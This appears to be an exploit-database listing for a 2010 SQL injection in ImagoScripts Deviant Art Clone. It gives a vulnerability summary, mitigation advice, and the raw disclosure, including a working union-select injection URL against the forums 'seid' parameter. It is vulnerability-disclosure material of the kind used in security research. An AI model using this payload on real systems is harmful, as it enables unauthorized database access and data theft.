header-logo
Suggest Exploit
vendor:
Deviant Art Clone
by:
alnjm33
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Deviant Art Clone
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

ImagoScripts Deviant Art Clone SQL Injection Vulnerability

A SQL injection vulnerability exists in ImagoScripts Deviant Art Clone, which allows an attacker to execute arbitrary SQL commands on the underlying database. This can be exploited by sending a specially crafted HTTP request to the vulnerable application. Successful exploitation could result in the execution of arbitrary SQL commands, disclosure of sensitive information, or even the complete compromise of the vulnerable system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use the least privileged account with access to the database.
Source

Exploit-DB raw data:

Exploit Title:ImagoScripts Deviant Art Clone SQL Injection Vulnerability
Date: 4/1/2010
Author: alnjm33
Software Link: http://imagoscripts.com/index.php?act=viewProd&productId=2 it cost 50$ :)
________________________
first join in site
site/path/index.php?mode=join
then log in
and this is exploit
site/path//index.php?mode=forums&act=viewcat&seid=-1/**/union/**/select 1,version(),3,4--